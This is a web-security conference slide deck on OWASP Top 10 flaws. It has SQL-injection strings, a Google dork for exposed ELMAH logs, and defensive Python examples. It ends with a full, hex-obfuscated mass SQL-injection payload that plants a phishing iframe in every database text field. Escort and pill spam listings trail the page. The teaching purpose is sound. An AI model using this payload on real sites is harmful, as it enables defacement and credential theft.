Top Web Apps
Security Vulnerabilities
Aleksandar Bozinovski
Technical Lead, Seavus
Agenda
Importance of Web Security
HTTP, Sessions, Cookies
Injection
Cross Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Direct Object References
Famous Quote
“Every program has at least two purposes: the
one for which it was written, and another for
which it wasn't.”
-Alan J. Perlis
Alan Jay Perlis was a computer scientist known for his
pioneering work in programming languages, and was the first
recipient of the Turing Award.
Bobby Tables
string query = "INSERT INTO Students VALUES ('" + txtName.Text + "','" + txtSSN.Text + "')";
// Attack: txtName = Robert'); DROP TABLE Students;--
INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')
Another one
Website Security Statistics
HTTP
Hypertext Transfer Protocol
– Language of the Web. The protocol used for
communication between web browsers and web
servers
– Standard: RFC 1945, 1996
URL
– Uniform Resource Locator (a kind of Uniform Resource Identifier)
Methods
– GET, POST, PUT, HEAD, OPTIONS
Statelessness, Cookies
• By its nature, HTTP is a stateless protocol.
– i.e. from one web page to the next there is nothing in the
protocol that allows a web program to maintain program “state”
(like a desktop program).
– “state” can be maintained by “witchery” or “trickery” if it is
needed.
• Cookie – a piece of data sent from a website and stored in the
user's web browser while the user is browsing that website.
– The server sets the cookie in a response.
– The client includes the cookie in the HTTP header of
subsequent requests to the server.
– Example cookie:
ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
Session Cookie Hijacking
OWASP Top 10
Injection
OWASP Definition
– Injection flaws, such as SQL, OS, and LDAP
injection, occur when untrusted data is sent to an
interpreter as part of a command or query. The
attacker’s hostile data can trick the interpreter
into executing unintended commands or accessing
unauthorized data.
Injection Characteristics
SQL Injection
Happens when we build a query but fail to
validate and sanitize untrusted input data.
Queries constructed by concatenating
strings are vulnerable to SQL injection.
SQL Queries
var categoryId = Request.QueryString["CategoryId"];
var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId;
// If we enter "7 OR 1=1" in the query string we end up with:
SELECT * FROM Products WHERE CategoryID=7 OR 1=1
// An attacker can use ; to terminate the current command and run
// their own commands:
SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
Prevent SQL Injection
Validate untrusted data. If input data is supposed
to be a number, convert it to a number or check it
with a regex.
Use parameterized SQL queries instead of string
soup.
– Using stored procedures is also a good idea, but keep
in mind that stored procedures are vulnerable if they
concatenate strings on their own.
Use ORMs (like Entity Framework) that are
inherently resistant to SQL injection.
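The deck's vulnerable query next to both fixes (validate the type, then bind the value as a parameter), as an added example that is not part of the original slides. The deck's code is C#/ASP.NET against SQL Server; this Python version uses an in-memory SQLite table so it runs without a server, and the mechanism is the same. The table and column names follow the deck; the product rows are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the deck's Products table (not real data).
SAMPLE_PRODUCTS = [
    (1, "Chai", 1),
    (2, "Chang", 1),
    (3, "Aniseed Syrup", 2),
    (4, "Tofu", 7),
]


def make_db():
    """In-memory SQLite database with a Products(ProductID, Name, CategoryID) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Products (ProductID INTEGER PRIMARY KEY, Name TEXT, CategoryID INTEGER)"
    )
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def products_by_category_unsafe(conn, category_id):
    """The deck's pattern: the query is built by concatenation, so the input is
    parsed as SQL. '7 OR 1=1' widens the WHERE clause to every row."""
    sql = "SELECT Name FROM Products WHERE CategoryID=" + category_id
    return [row[0] for row in conn.execute(sql)]


def parse_category_id(raw):
    """Validation step from the deck: a value that must be a number is converted
    to one. Returns None when the input is not an integer."""
    try:
        return int(raw)
    except (TypeError, ValueError):
        return None


def products_by_category_param_only(conn, category_id):
    """Parameterized query with no validation: the driver sends the value as data,
    so '7 OR 1=1' is compared as a literal and simply matches nothing."""
    rows = conn.execute("SELECT Name FROM Products WHERE CategoryID = ?", (category_id,))
    return [row[0] for row in rows]


def products_by_category_safe(conn, category_id):
    """Both defenses together: check the type, then bind it as a parameter."""
    cid = parse_category_id(category_id)
    if cid is None:
        raise ValueError("CategoryId must be an integer")
    return products_by_category_param_only(conn, cid)


if __name__ == "__main__":
    db = make_db()
    print("unsafe, normal input:    ", products_by_category_unsafe(db, "7"))
    print("unsafe, '7 OR 1=1':      ", products_by_category_unsafe(db, "7 OR 1=1"))
    print("safe, normal input:      ", products_by_category_safe(db, "7"))
    print("param only, '7 OR 1=1':  ", products_by_category_param_only(db, "7 OR 1=1"))
```

The stacked-query variant from the slide (`; DROP TABLE Products`) is not reproduced here because `sqlite3`'s `execute()` refuses more than one statement per call; SQL Server runs the whole batch, which is why it matters in the deck's setting.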
Other Injection Attacks
LDAP Injection
– string ldapSearch = "(cn=" + txtSearchTerm.Text + ")";
Dynamic LINQ Injection
– string where = "Table.Contains(\"" + search + "\")";
XPath Injection
– string loginExpression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
Cross-Site Scripting (XSS)
OWASP Definition
– XSS flaws occur whenever an application takes
untrusted data and sends it to a web browser
without proper validation and escaping. XSS
allows attackers to execute scripts in the victim’s
browser which can hijack user sessions, deface
web sites, or redirect the user to malicious sites.
XSS Characteristics
Types of XSS Attacks
Stored XSS
• Stored attacks are those where the injected code is
permanently stored on the target servers.
• Users should not be able to create message content that
could cause another user to load an undesirable page or
undesirable content when the user's message is retrieved.
Reflected XSS
• Reflected attacks are those where the injected code is
reflected off the web server, such as in an error message,
search result.
• Reflected attacks are delivered to victims via another route,
such as in an e-mail message, or on some other web server.
Built-in protection
Modern browsers and servers employ many
first line defenses against XSS by default:
– ASP.NET Request Validation, present since version
2.0. In ASP.NET 4.0 it is enabled for all types of
requests, not just pages. To turn it off we must
revert to the older mode:
requestValidationMode="2.0"
– Output encoding. The MVC Razor view engine encodes
everything by default. XSS is possible only if we
use @Html.Raw()
Built-in protection
– AntiXSS library is by default included in ASP.NET
Web Forms 4.5. Can be retrofitted on older web
apps.
– Google Chrome has built-in anti XSS protection
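What "encode everything by default, bypass only on explicit request" looks like in code, as an added Python example that is not from the slides. It mirrors the Razor behaviour described above: every interpolated value is HTML-encoded unless wrapped in a marker type that plays the role of @Html.Raw(). The Raw class, the render functions and the sample messages are constructed for this illustration.

```python
import html


class Raw(str):
    """Marker for a value that is already trusted HTML. Only values wrapped in Raw
    bypass encoding, the explicit opt-out that @Html.Raw() represents."""


def encode(value):
    """Default path for every interpolated value: HTML-encode it, quotes included,
    so it is safe both between tags and inside a double-quoted attribute."""
    if isinstance(value, Raw):
        return str(value)
    return html.escape(str(value), quote=True)


def render_comment(author, body):
    """Render one stored message. The author lands in an attribute and the body
    between tags; both go through encode() unless explicitly marked Raw."""
    return (
        f'<div class="comment" data-author="{encode(author)}">'
        f"<p>{encode(body)}</p></div>"
    )


def render_thread(messages):
    """Stored-XSS scenario: messages come from the database, possibly written by
    one user, and are rendered into a page that another user loads."""
    return "\n".join(render_comment(m["author"], m["body"]) for m in messages)


# Constructed sample rows as they might sit in a messages table after a hostile submission.
SAMPLE_MESSAGES = [
    {"author": "alice", "body": "Hello <3"},
    {"author": 'x" onmouseover="alert(1)', "body": "<script>alert(document.cookie)</script>"},
]

if __name__ == "__main__":
    print(render_thread(SAMPLE_MESSAGES))
```

The second sample row attacks two contexts at once (an attribute and element content); `html.escape(..., quote=True)` covers both, which is why the attribute is double-quoted in the template. Unquoted attributes would need stricter encoding.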
Cross-Site Request Forgery
OWASP Definition
– A CSRF attack forces a logged-on victim’s browser
to send a forged HTTP request, including the
victim’s session cookie and any other
automatically included authentication
information, to a vulnerable web application. This
allows the attacker to force the victim’s browser to
generate requests the vulnerable application
thinks are legitimate requests from the victim.
CSRF Characteristics
How CSRF works
• Authenticated sessions are persisted via cookies. The
cookie is sent with every request to the domain.
• The attacking site recreates a legitimately formed request
to the target site, although the request has a malicious
payload (query string parameters or post data).
• The victim's browser is tricked into issuing the request.
For all intents and purposes, the target website views it
as a legitimate request.
CSRF Tokens
• To mitigate this risk, we can add randomness via a CSRF
token.
• A token is a random string known to both the legitimate
page where the form is and to the browser via a cookie.
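The server-side token check, as an added Python example (not the deck's or ASP.NET's code). The slide describes the double-submit form, where the browser also holds the token in a cookie; this version instead binds the token to the session id with an HMAC under a server-side key, which a cross-site page can neither compute nor read. Both variants enforce the same thing: the session cookie alone, which the browser attaches automatically, is not enough. The cookie name is the deck's ASP.NET_SessionId example, the form field is named after the one ASP.NET MVC's anti-forgery helper emits, and the request dicts stand in for the framework's request object.

```python
import hashlib
import hmac
import secrets

# Server-side secret: generated at startup here, kept in protected config in a real deployment.
SERVER_KEY = secrets.token_bytes(32)

SESSION_COOKIE = "ASP.NET_SessionId"        # the deck's example cookie
TOKEN_FIELD = "__RequestVerificationToken"  # field name ASP.NET MVC's helper uses


def issue_csrf_token(session_id, key=SERVER_KEY):
    """Token bound to the session: HMAC(server key, session id). The legitimate
    page embeds it in the form; an attacking site cannot derive or read it."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def render_form(session_id):
    """The legitimate page: a hidden field carries the token the server expects."""
    token = issue_csrf_token(session_id)
    return (
        '<form method="post" action="/Account/ChangeEmail">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{token}">'
        '<input name="email"><button>Save</button></form>'
    )


def validate_csrf(request, key=SERVER_KEY):
    """Check for a state-changing POST. `request` is a dict with 'cookies' and
    'form' mappings. Missing token -> reject; mismatched token -> reject, compared
    in constant time so the check itself leaks nothing."""
    session_id = request["cookies"].get(SESSION_COOKIE)
    submitted = request["form"].get(TOKEN_FIELD)
    if not session_id or not submitted:
        return False
    expected = issue_csrf_token(session_id, key)
    return hmac.compare_digest(expected, submitted)


def legitimate_request(session_id, email):
    """Constructed: a POST produced by the real form, token included."""
    return {
        "cookies": {SESSION_COOKIE: session_id},
        "form": {TOKEN_FIELD: issue_csrf_token(session_id), "email": email},
    }


def forged_request(session_id, email):
    """Constructed: the same POST recreated by a third-party page. The victim's
    browser still attaches the session cookie, but the token is absent."""
    return {"cookies": {SESSION_COOKIE: session_id}, "form": {"email": email}}


if __name__ == "__main__":
    sid = "haay355s5g0vm5zotvlncqpr"
    print("legitimate accepted:", validate_csrf(legitimate_request(sid, "me@example.com")))
    print("forged accepted:    ", validate_csrf(forged_request(sid, "other@example.com")))
```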
Security Misconfiguration
OWASP Definition
– Good security requires having a secure
configuration defined and deployed for the
application, frameworks, application server, web
server, database server, and platform. All these
settings should be defined, implemented, and
maintained as many are not shipped with secure
defaults. This includes keeping all software up to
date, including all code libraries used by the
application.
Characteristics
Keep up to date
Your servers
– Windows Server 2012 is arguably more secure
than Windows Server 2003
Client browsers (if applicable)
– Modern browsers include built-in defenses against
most prevalent attacks
Keep your frameworks up to date
Set Custom Errors, hide the YSOD (Yellow Screen of Death)
Turn Off Tracing
Also don’t forget to turn off
ELMAH
– Cases with unprotected ELMAH handlers are
notorious.
– Google dork: inurl:"elmah.axd"
DEBUG
– Performance penalties
– Although not a direct security risk on its own,
beware of #if DEBUG blocks that can disclose
information
Also don’t forget to turn off
Script execution on folders where not needed
– Usually folders where various documents or
uploaded files are kept, unless you use App_Data
folder.
HTTP Access to Logs
– Log files can disclose many sensitive details about
your web app. It’s best to keep them outside of
the web app root. If not possible at least keep
them in App_Data.
Insecure Direct Object References
OWASP Definition
– A direct object reference occurs when a developer
exposes a reference to an internal implementation
object, such as a file, directory, or database key.
Without an access control check or other
protection, attackers can manipulate these
references to access unauthorized data.
Characteristics
Direct Object References
– A direct object reference is an observable key
used to identify an individual record in the database
• http://northwind.com/Products?catId=1
• http://northwind.com/Products?catId=3
• http://northwind.com/Products?catId=8
Direct Object References
– Another example
• http://webapp.com/Download?f=DSC01031.JPG
• http://webapp.com/Download?f=DSC01032.JPG
• http://webapp.com/Download?f=DSC01033.JPG
Prevention
Implementing proper access control
– Validate user data
– Implement security checks before using object
reference
Access via undiscoverable surrogate keys
– Integer and natural string types are vulnerable to
enumeration
– A surrogate key that is not pattern-based can add
further obfuscation
• A GUID is a good example
– However, it is security through obscurity
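The two prevention points carried into code, as an added Python example that is not from the slides: a download handler that checks ownership before resolving the reference, and a GUID surrogate key that removes enumeration but keeps the check, since obscurity alone is not access control. The in-memory store, the user names and the file ids (1031 and 1032, after the deck's DSC01031.JPG example) are constructed.

```python
import uuid

# Constructed in-memory store. Integer keys mirror the deck's ?f=DSC01031.JPG / ?catId=3
# style of guessable reference; the GUID is the surrogate key alternative.
DOCUMENTS = {}
BY_GUID = {}


def add_document(doc_id, owner, content):
    surrogate = str(uuid.uuid4())
    DOCUMENTS[doc_id] = {"owner": owner, "content": content, "guid": surrogate}
    BY_GUID[surrogate] = doc_id
    return surrogate


def seed():
    """Reset the store to two users' files (constructed sample data)."""
    DOCUMENTS.clear()
    BY_GUID.clear()
    add_document(1031, "alice", b"alice's photo")
    add_document(1032, "bob", b"bob's photo")


def guid_of(doc_id):
    return DOCUMENTS[doc_id]["guid"]


def download_unchecked(doc_id):
    """The vulnerable shape from the deck: the id in the request is used directly,
    so changing 1031 to 1032 in the URL returns another user's file."""
    return DOCUMENTS[doc_id]["content"]


def can_download(user, doc_id):
    """The access control check: the caller must own the referenced object."""
    doc = DOCUMENTS.get(doc_id)
    return doc is not None and doc["owner"] == user


def download(user, doc_id):
    """Resolve the reference only after the check passes. Unknown ids and ids the
    user does not own produce the same error, so nothing about existence leaks."""
    if not can_download(user, doc_id):
        raise PermissionError("not found")
    return DOCUMENTS[doc_id]["content"]


def download_by_guid(user, guid):
    """Surrogate key variant: the GUID cannot be enumerated, but the ownership
    check stays in place."""
    doc_id = BY_GUID.get(guid)
    if doc_id is None:
        raise PermissionError("not found")
    return download(user, doc_id)


seed()

if __name__ == "__main__":
    print("unchecked, bob's file via alice's browser:", download_unchecked(1032))
    print("alice may read 1032:", can_download("alice", 1032))
    print("alice via GUID:", download_by_guid("alice", guid_of(1031)))
```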
Real example: phishing with
obfuscated SQL injection and XSS
--1. The malicious query appends script to all text values in all tables in the database
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) and b.name not like '%username%' and b.name not like '%password%'
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + ''
<script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z-
index:1000;width:100%;height:100%;"><iframe width="100%" height="100%"
src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like
''%http://codecamp.local/EvilSite/Login.aspx%''');
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Real example: phishing with
obfuscated SQL injection and XSS
--2. The query is written as a one-line string
'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or
b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-
index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor'
--3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters.
SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
@T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-
index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX))
-- result:
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563
7420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C
696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E45585420
46524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B27
5D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C64697620
7374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C69
6672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707
822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40
432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
--4. Final attack is:
a' OR 1=1; DECLARE @S CHAR(4000);SET @S =
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D
27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F7
4206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E455
8542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B405
42B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646
976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223
E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E61
73707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B2
72B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E455854204
6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as
CHAR(4000));EXEC(@S)--
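From the defender's side, the notable property of this payload is that the SQL text is hidden inside a hex literal that only becomes readable after CAST ... AS CHAR, so a keyword filter on the raw request sees nothing but hex digits. The added Python example below (not from the slides) decodes such literals found in request parameters or log lines and reports the fingerprints the deck's payload carries; the regular expressions, the sample log lines and the hex-encoded stand-in are constructed for the example. It generalizes slightly beyond the slide: VARCHAR, NCHAR and NVARCHAR casts are matched as well as CHAR.

```python
import re

# Shape of the deck's payload: a hex literal is CAST back to a character type and
# handed to EXEC, so the SQL that actually runs never appears in clear text.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE)
EXEC_CALL = re.compile(r"\bEXEC\s*\(", re.IGNORECASE)
# Fragments worth reporting once decoded; the deck's payload contains all three.
SUSPICIOUS = ("<script", "sysobjects", "update [")


def decode_hex_literal(hex_digits):
    """Undo the CAST(... AS VARBINARY) step: hex digits -> bytes -> text."""
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]  # truncated literal: decode only whole bytes
    return bytes.fromhex(hex_digits).decode("latin-1")


def inspect_value(value):
    """Check one (URL-decoded) request parameter. Returns a finding dict, or None
    when the value carries no hex CAST at all."""
    m = HEX_CAST.search(value)
    if not m:
        return None
    decoded = decode_hex_literal(m.group(1))
    low = decoded.lower()
    return {
        "exec": bool(EXEC_CALL.search(value)),
        "decoded": decoded,
        "hits": [s for s in SUSPICIOUS if s in low],
    }


def scan_log(lines):
    """Run inspect_value over log lines; return (line number, finding) pairs."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = inspect_value(line)
        if finding:
            findings.append((number, finding))
    return findings


# Constructed sample. The decoded part is a harmless stand-in that shares the
# sysobjects fingerprint; it is hex-encoded here the way the CAST step would do it.
_STAND_IN = "select a.name from sysobjects a where a.xtype='u'"
SAMPLE_PARAM = (
    "a' OR 1=1; DECLARE @S CHAR(4000);SET @S=CAST(0x"
    + _STAND_IN.encode().hex().upper()
    + " AS CHAR(4000));EXEC(@S)--"
)
# Constructed log lines, shown with the query string already URL-decoded.
SAMPLE_LOG = [
    "GET /Products?catId=7 200",
    "GET /Products?catId=" + SAMPLE_PARAM + " 500",
    "GET /Download?f=DSC01031.JPG 200",
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: exec={finding['exec']} hits={finding['hits']}")
        print("  decoded:", finding["decoded"])
```

A hit on `exec` plus any decoded fingerprint is a strong signal; a hex CAST with no fingerprints still deserves a look, because the list above only covers what this one payload contains.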
Questions?
• Complete electronic evaluation forms on the
computers in the hall and enter to win!
– Infragistics Ultimate
– Telerik DevCraft
– JetBrains .NET tools
– Semos training vouchers
– Pluralsight subscriptions
– and many more…
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 

Recently uploaded (20)

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
